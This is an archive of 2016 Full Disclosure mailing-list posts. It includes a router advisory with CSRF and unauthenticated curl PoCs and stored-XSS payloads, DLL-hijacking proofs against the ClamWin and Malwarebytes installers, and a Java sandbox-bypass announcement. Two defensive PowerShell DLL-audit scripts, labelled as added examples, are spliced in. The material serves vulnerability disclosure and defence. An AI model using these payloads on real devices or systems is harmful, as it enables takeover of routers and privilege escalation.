Software Version ST9D.01.09
Serial Number 00939902404041
Firmware Name TWG850-4U-9D.01.09-100528-S-001.bin

[Vulnerabilities]
1- Cross-Site Request Forgery
2- Unauthenticated access to resources
3- Persistent Cross-Site Scripting

[Advisory Timeline]
06-Jan-2016 - Vendor contacted through the website
11-Jan-2016 - Email sent to vendor
09-Mar-2016 - Public Disclosure

[Description of Vulnerabilities]
1- Cross-Site Request Forgery
An attacker who lures a TWG850-4U user (authenticated or unauthenticated)
to browse a malicious website can exploit cross site request forgery (CSRF)
to submit commands to the wireless router and gain control of the product.
The attacker could submit a variety of commands including but not limited to
changing the admin account password, the network settings, etc.
The entire application is vulnerable; for example it is possible to:
Change user/password & Factory Reset
- http:///goform/RgSecurity
Change wireless settings
- http:///goform/wlanPrimaryNetwork
Restore a backup
- http:///goform/RgBackupRestore
Enable/Disable Advanced Options
- http:///goform/RgOptions
Store a XSS
- http:///goform/RgTime

[PoC for Change user/password]


http://192.168.0.1/goform/RgSecurity"; method="POST">









2- Unauthenticated access to resources
It is possible to perform actions within the router configuration without
being authenticated; it's only required to know the proper urls and
parameters. For example it is possible to:

Wireless name and password in plain text
- http:///GatewaySettings.bin
Restore a backup
- http:///goform/RgBackupRestore
Change Advanced Options
- http:///goform/RgOptions
Store a XSS
- http:///goform/RgTime
Change user/password & Factory Reset
- http:///goform/RgSecurity
Change Wireless name and password
- http:///goform/wlanPrimaryNetwork

[PoC for Change Wireless name and password]
curl -i -s -k -X 'POST' -H 'Content-Type:
application/x-www-form-urlencoded' --data-binary
$'PrimaryNetworkEnable=1&ServiceSetIdentifier=&ClosedNetwork=0&WpaPskAuth=1&Wpa2PskAuth=1&WpaEncryption=3&WpaPreSharedKey=&ShowWpaKey=0x01&WpaRekeyInterval=0&GenerateWepKeys=0&WepKeysGenerated=0&displayPrimaryROMsg=0&commitwlanPrimaryNetwork=1'
'http:///goform/wlanPrimaryNetwork'

3- Persistent Cross-Site Scripting
Two instances of a stored cross-site scripting vulnerability were found within the router
web interface.
- http:///goform/RgTime [TimeServer1 Parameter]
- http:///goform/RgTime [TimeServer2 Parameter]
- http:///goform/RgTime [TimeServer3 Parameter]
- http:///goform/RgUrlBlock [BasicParentalNewKeyword Parameter]

[PoC #1]
POST /goform/RgTime HTTP/1.1
<..>

TimeSntpDisable=2&TimeServer1=clock.via.net&TimeServer2=ntp.nasa.gov
&TimeServer3=%22%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&TimeZoneOffsetHrs=0&TimeZoneOffsetMins=0&ResetSntpDefaults=

[PoC #2]
POST /goform/RgUrlBlock HTTP/1.1
<..>

BasicParentalNewKeyword=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&BasicParentalKeywordAction=1&BasicParentalNewDomain=&BasicParentalDomainAction=0

S3ba
@s3bap3
http://linkedin.com/in/s3bap3



Re: [FD] Netgear GS105Ev2 - Multiple Vulnerabilities

2016-03-09 Thread Benedikt Westermann
Hi Nick,

> The Netgear website [1] shows that a new version of the firmware was 
> released 2 days after your FD post - version 1.4.0.6.
> The release notes [2] for the new version don't refer to these 
> security issues in any way (instead they mention three fairly 
> minor-sounding bugs fixed).

>> Firmware version: 1.3.0.3,1.4.0.2
>> Status: unfixed

Status remains the same. The vulnerabilities are also valid for the new version 
1.4.0.6. I checked it and could still reproduce the password reset, the XSS and 
the CSRF, and also found the cookie mentioned in the report after login. 
So, nothing has changed with respect to the vulnerabilities.

Regards,
Benedikt


smime.p7s
Description: S/MIME cryptographic signature


[FD] Security contact @ Gigabyte

2016-03-09 Thread Gustavo Sorondo
Hi list,

I'd like to know if anyone here knows someone working on security at
Gigabyte (http://www.gigabyte.com/), since we are trying to responsibly
report a high-risk security flaw we found.

We opened a ticket asking to be contacted by their security team, and the
answer we got was:

"Thanks for your interest, but we already have a security team for our
websites. Regards, GIGABYTE" (sigh)

So, if any of you knows someone in there, please let us know.

Thanks!

Gus.-

--
Ing. Gustavo M. Sorondo
Cinta Infinita - CTO
Web: http://cintainfinita.com
LinkedIn: https://www.linkedin.com/in/gustavosorondo
GPG: http://www.cintainfinita.com/gpg/gs-pkey.txt



[FD] Open Vulnerablity ID tracker instead of CVE. Maybe

2016-03-09 Thread op7ic \x00
Hello List,

I'm growing a bit tired of the way MITRE assigns CVEs (or just ignores you),
so instead I thought some unmoderated list would be easier to manage. I
opted to keep the same format as CVE with the exception of the first three
letters.

https://www.freeovi.com

It's a completely unmoderated generator, so feel free to use it and suggest
improvements.

Thanks



Re: [FD] Windows Mail Find People DLL side loading vulnerability

2016-03-09 Thread Stefan Kanthak
"Securify B.V." wrote:

> 
> Windows Mail Find People DLL side loading vulnerability
> 
> Yorick Koster, September 2015

[...]

> - CVE-2016-0100
> - MS16-025: Security Update for Windows Library Loading to Address
> Remote Code Execution (3140709)
> 
> 
> Tested versions
> 
> This issue was successfully verified on Windows Vista + Office 2010
> 32-bit.

This vulnerability demonstrates Microsoft's terrible SLOPPY coding
horror^Wpractice: it needs two mistakes to create this kind of bug!

"%CommonProgramFiles%\System\wab32res.dll" is (as its name implies)
a resource DLL, which means that it contains no code, but only
(localized) resources, and SHOULD (better: MUST) be loaded via
LoadLibraryEx("%CommonProgramFiles%\System\wab32res.dll", NULL, 
LOAD_LIBRARY_AS_DATAFILE)
to avoid the call of its DllMain() startup code!
See 

JFTR: LOAD_LIBRARY_AS_DATAFILE was introduced in the last millennium!

Either
LoadLibrary("%CommonProgramFiles%\System\wab32res.dll")
or
LoadLibraryEx("wab32res.dll", NULL, LOAD_LIBRARY_AS_DATAFILE)
were sufficient to avoid this vulnerability.

> 
> Fix
> 
> Microsoft released MS16-025 that fixes this vulnerability.

Have you checked how Microsoft fixed it?
Did they exercise all due diligence now, practised defense in depth
and replaced the call to
LoadLibrary("wab32res.dll")
with a call to
LoadLibraryEx("%CommonProgramFiles%\System\wab32res.dll", NULL, 
LOAD_LIBRARY_AS_DATAFILE)?

> 
> Details
> 
> https://www.securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html


regards
Stefan



[FD] Executable installers are vulnerable^WEVIL (case 30): clamwin-0.99-setup.exe allows arbitrary (remote) code execution WITH escalation of privilege

2016-03-09 Thread Stefan Kanthak
Hi @ll,

the executable installer clamwin-0.99-setup.exe (available from
) loads and executes DWMAPI.dll
or UXTheme.dll from its "application directory".


For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
,

and  for
"prior art" about this well-known and well-documented vulnerability.


If an attacker places one of the above named DLLs in the user's
"Downloads" directory (for example per "drive-by download"
or "social engineering") this vulnerability becomes a remote
code execution.


Proof of concept/demonstration:
~~~

1. visit , download
   , save it
   as UXTheme.dll in your "Downloads" directory, then copy it as
   DWMAPI.dll;

2. download clamwin-0.99-setup.exe and save it in your "Downloads"
   directory;

3. execute clamwin-0.99-setup.exe from your "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in
   step 1.

PWNED!


See ,
 and
 plus
 and
 for details about
this well-known and well-documented BEGINNER'S error!  


stay tuned
Stefan Kanthak


PS: I really LOVE (security) software with such trivial beginner's
errors. It's a tell-tale sign to stay away from this snakeoil!


Timeline:
~

2016-03-06    sent vulnerability report to authors

: host aspmx.l.google.com[64.233.184.26] said: 550-5.1.1
The email account that you tried to reach does not exist. Please try
550-5.1.1 double-checking the recipient's email address for typos or
550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1
https://support.google.com/mail/answer/6596 y186si9894139wmy.43 - gsmtp (in
reply to RCPT TO command)

: host mx.sourceforge.net[216.34.181.68] said: 550 unknown user
(in reply to RCPT TO command)

2016-03-06    report published

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
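An added example, not code from the post above nor from the ClamWin project: a runtime counterpart to step 4 of the proof of concept. Instead of relying on a message box from a canary DLL, this PowerShell script walks every reachable process and flags modules loaded from user-writable download and temp locations, then checks whether a file of the same name exists in System32 (a shadowed system DLL, as with UXTheme.dll and DWMAPI.dll) and whether the loaded copy carries a valid Authenticode signature. The list of suspect directories is my assumption; module enumeration for elevated or protected processes requires running the script from an elevated shell.

```powershell
# Added example (not from the original post): flag modules that a running
# process has loaded from user-writable download/temp directories, i.e. what
# a planted UXTheme.dll or DWMAPI.dll looks like once the installer started.
param(
    # Assumed set of locations a browser or user drops files into; extend as needed.
    [string[]]$SuspectDirs = @(
        (Join-Path $env:USERPROFILE 'Downloads'),
        (Join-Path $env:PUBLIC 'Downloads'),
        $env:TEMP
    )
)

function Test-UnderDirectory([string]$File, [string]$Dir) {
    # Prefix match on the normalised directory, case-insensitive as NTFS is.
    $d = $Dir.TrimEnd('\') + '\'
    return $File.StartsWith($d, [System.StringComparison]::OrdinalIgnoreCase)
}

$findings = foreach ($proc in Get-Process) {
    # Module enumeration throws for protected processes and, from a
    # non-elevated shell, for elevated ones; those need an elevated run.
    try { $modules = $proc.Modules } catch { continue }
    foreach ($mod in $modules) {
        $file = $mod.FileName
        if (-not $file) { continue }
        foreach ($dir in $SuspectDirs) {
            if (-not (Test-UnderDirectory $file $dir)) { continue }
            $sig = Get-AuthenticodeSignature -LiteralPath $file
            [pscustomobject]@{
                PID             = $proc.Id
                Process         = $proc.ProcessName
                Module          = $mod.ModuleName
                Path            = $file
                # True when the same file name exists in System32: the loaded
                # copy shadows a system DLL via the application directory.
                ShadowsSystem32 = Test-Path -LiteralPath (Join-Path $env:SystemRoot "System32\$($mod.ModuleName)")
                Signature       = $sig.Status
                Signer          = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
            }
        }
    }
}

if ($findings) {
    $findings | Sort-Object ShadowsSystem32 -Descending | Format-Table -AutoSize
} else {
    "No modules loaded from: $($SuspectDirs -join ', ')"
}
```

Run it while the installer's UI is still open, because the check is a snapshot of currently loaded modules. Hits under TEMP are expected for installers that unpack their own helper DLLs there; the ShadowsSystem32 column singles out the case this post describes, a DLL that should have come from System32 but was resolved from the application directory first. For continuous coverage the same condition can be expressed over Sysmon image-load events (Event ID 7) instead of polling processes.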


[FD] Executable installers are vulnerable^WEVIL (case 31): MalwareBytes' installers allow arbitrary (remote) code execution WITH escalation of privilege

2016-03-09 Thread Stefan Kanthak
Hi @ll,

Malwarebytes executable installers mbam-setup-2.2.0.1024.exe
and mbae-setup-1.08.1.1189.exe (available from
 and
) load
and execute UXTheme.dll and DWMAPI.dll from their "application
directory".

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
,

and 


If an attacker places UXTheme.dll and/or DWMAPI.dll in the user's
"Downloads" directory, for example per "drive-by download" or
"social engineering", this vulnerability becomes a remote code
execution.

Due to the application manifest embedded in the executables which
specifies "requireAdministrator" the executable installers are run
with administrative privileges ("protected" administrators are
prompted for consent, unprivileged standard users are prompted for
an administrator password); execution of the DLLs therefore results
in an escalation of privilege!


Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. visit , download
   , save it
   as UXTheme.dll in your "Downloads" directory, then copy it as
   DWMAPI.dll;

2. download mbam-setup-2.2.0.1024.exe and mbae-setup-1.08.1.1189.exe
   and save them in your "Downloads" directory;

3. execute mbam-setup-2.2.0.1024.exe and mbae-setup-1.08.1.1189.exe
   from your "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in step 1.

PWNED!


See ,
 and
http://seclists.org/fulldisclosure/2015/Dec/33 plus
 and
 for details about
this well-known and well-documented BEGINNER'S error!


regards
Stefan Kanthak


PS: I really LOVE (security) software with such trivial beginner's
errors. It's a tell-tale sign to stay away from this snakeoil!


Timeline:
~~~~~~~~~

2015-12-25  sent report regarding MBAM to vendor

2015-12-25  automatic reply from vendor:
            "We have received your request and an agent will respond
             to your ticket in the order in which it was received."

2016-01-03  reply from vendor:
            "We'll take this into consideration for a near-future
             installer revamp."

2016-02-02  requested status update

            NO REPLY, not even an acknowledgement of receipt

2016-02-02  sent notice to Marcin Kleczynski after his public
            announcement of a bug bounty program

2016-02-02  reply from Marcin Kleczynski:
            "I'm copying Pedro Bustamante who organizes our bug
             bounty program to take a look."

            NO reply from Pedro Bustamante et al.

2016-02-12  sent report regarding MBAE to vendor

            NO REPLY, not even an acknowledgement of receipt

2016-02-22  resent report regarding MBAE to vendor

            NO REPLY, not even an acknowledgement of receipt

2016-03-06  report published in accordance with my disclosure
            policy 

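An added example serving both this post and the ClamWin one (case 30) above; it is not code from either post nor from Malwarebytes or ClamWin. Before running the proof-of-concept procedure, a practitioner wants to know two things about an installer: which DLL names it refers to that the loader would search for on disk (KnownDLLs are mapped from the \KnownDlls object directory and API sets are resolved by schema, so neither can be hijacked from the application directory), and whether the embedded manifest asks for requireAdministrator, which is what turns a planted DLL into an elevation of privilege. The script below answers both statically by text-scanning the image, so it sees import-table names as well as string literals passed to LoadLibrary; the assumption is that the installer is an ordinary PE file with its manifest stored as plain XML in the resource section.

```powershell
# Added example, not code from the original posts or the vendors: static audit
# of an executable installer for the application-directory DLL search issue.
param(
    [Parameter(Mandatory = $true)][string]$Path
)

$Path   = (Resolve-Path -LiteralPath $Path).ProviderPath
$appDir = Split-Path -Parent $Path          # the "application directory", e.g. Downloads
$bytes  = [System.IO.File]::ReadAllBytes($Path)

# Decode the image as ASCII and as UTF-16LE at both byte alignments so that
# narrow and wide DLL name strings are found wherever they sit in the file.
$texts = @(
    [System.Text.Encoding]::ASCII.GetString($bytes),
    [System.Text.Encoding]::Unicode.GetString($bytes),
    [System.Text.Encoding]::Unicode.GetString($bytes, 1, $bytes.Length - 1)
)
$dllNames = foreach ($t in $texts) {
    [regex]::Matches($t, '(?i)(?<![a-z0-9_\-])[a-z0-9_\-]{2,40}\.dll(?![a-z0-9_\-])') |
        ForEach-Object { $_.Value.ToLowerInvariant() }
}
$dllNames = $dllNames | Sort-Object -Unique

# KnownDLLs are never searched for on the file system, so they are safe.
$knownKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
$known = (Get-ItemProperty -LiteralPath $knownKey).PSObject.Properties |
    Where-Object { $_.Name -notlike 'PS*' -and $_.Name -notlike 'DllDirectory*' } |
    ForEach-Object { ([string]$_.Value).ToLowerInvariant() }

# requestedExecutionLevel from the embedded manifest (plain XML in the image).
$level = if ($texts[0] -match 'level\s*=\s*["''](requireAdministrator|highestAvailable|asInvoker)["'']') {
    $Matches[1]
} else { '(no manifest level found)' }

$findings = foreach ($dll in $dllNames) {
    # API sets are resolved through the loader's apiset schema, not the search path.
    if ($dll -like 'api-ms-win-*' -or $dll -like 'ext-ms-*') { continue }
    $inSystem32 = Test-Path -LiteralPath (Join-Path $env:SystemRoot "System32\$dll")
    $inAppDir   = Test-Path -LiteralPath (Join-Path $appDir $dll)
    $isKnown    = $known -contains $dll
    [pscustomobject]@{
        Dll        = $dll
        KnownDll   = $isKnown
        InSystem32 = $inSystem32
        InAppDir   = $inAppDir       # a copy already sitting next to the installer
        # A system DLL name that is not a KnownDLL is looked up in the
        # application directory before System32: hijackable by a planted file.
        Hijackable = (-not $isKnown) -and $inSystem32
    }
}

"Installer : $Path"
"App dir   : $appDir"
"Manifest  : requestedExecutionLevel = $level"
$findings | Sort-Object Hijackable -Descending | Format-Table -AutoSize

$hits = @($findings | Where-Object { $_.Hijackable })
if ($hits.Count -gt 0 -and $level -eq 'requireAdministrator') {
    Write-Warning ("{0} system DLL name(s) would be resolved from '{1}' before System32 and the installer runs elevated: {2}" -f `
        $hits.Count, $appDir, ($hits.Dll -join ', '))
}
```

A positive result is a reason to run the canary test from the proof of concept, not a verdict: a name can appear in the binary without ever being loaded, and the scan cannot see whether the code loads it with LoadLibraryEx(..., LOAD_LIBRARY_SEARCH_SYSTEM32) or after SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32), which is the developer-side fix that removes the application directory from the search. A name that is neither a KnownDLL nor present in System32 is the installer's own helper DLL and belongs to a different discussion. The InAppDir column is the defender's quick check: any of the flagged names already present next to the installer in Downloads is exactly the condition the post describes.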


[FD] [SE-2012-01] Broken security fix in Oracle Java SE 7/8/9

2016-03-09 Thread Security Explorations


Hello All,

On Mar 07, 2016 Security Explorations modified its Disclosure Policy [1].
As a result, we do not tolerate broken fixes any more. If an instance
of a broken fix for a vulnerability we already reported to the vendor
is encountered, it gets disclosed by us without any prior notice.

The vendor that gets the questionable honor to be the first to experience
our modified Disclosure Policy is Oracle.

Yesterday, during my JavaLand talk [2], while discussing the problems
related to Java platform security, its ecosystem and vendors, I disclosed
general information about a broken Oracle Java SE fix from Sep 2013:

http://www.security-explorations.com/materials/se-javaland.pdf

This was the fix for the last vulnerability we reported to the company
as part of our Java SE security research (Issue 69 [3]). This weakness
made it possible to implement a very classic attack against JVM (class
spoofing attack).

According to Oracle, the vulnerability was addressed by a backported
(from JDK 8) implementation of the affected component (method handles
API) in JDK 7 Update 40 from Sep 2013.

We, however, found out that Oracle's patch could be trivially bypassed
with the use of the following:
- four character change to our original POC code published in Oct 2013,
- a custom HTTP server enforcing "404 (Not Found)" error when requesting
  a given class for the first time.

Full technical details of Oracle fix bypass can be found in our technical
report:

http://www.security-explorations.com/materials/SE-2012-01-ORACLE-14.pdf

Along with the report, we have also published a Proof of Concept code to
illustrate the broken fix:

http://www.security-explorations.com/materials/se-2012-01-69.2.zip

The POC was successfully verified in the environment of Java SE 7 Update
97, Java SE 8 Update 74 and Java SE 9 Early Access Build 108. A complete
Java security escape could be achieved with it.

Please note that the published material constitutes neither a bypass
of Java security levels nor of its Click2Play functionality. It's a mere
Java security sandbox escape.

Finally, it is worth noting that besides breaking the fix for Issue 69
(CVE-2013-5838), Oracle also improperly evaluated its impact. Oracle
Critical Patch Update from Oct 2013 indicated that Issue 69 could "be
exploited only through sandboxed Java Web Start applications and sandboxed
Java applets". This is not true. We verified that it could be successfully
exploited in a server environment as well, such as Google App Engine for
Java [4].

Thank you.

--
Best Regards,
Adam Gowdiak

-
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
-

References:
[1] Disclosure Policy
http://www.security-explorations.com/en/disclosure-policy.html
[2] JavaLand conference, "Java (in)security" talk
http://www.javaland.eu/en/javaland-2016/
[3] SE-2012-01-ORACLE-13, Issue 69
http://www.security-explorations.com/materials/SE-2012-01-ORACLE-13.pdf
[4] SE-2014-02, Issue21 (POC23)
http://www.security-explorations.com/materials/se-2014-02-32-34.zip

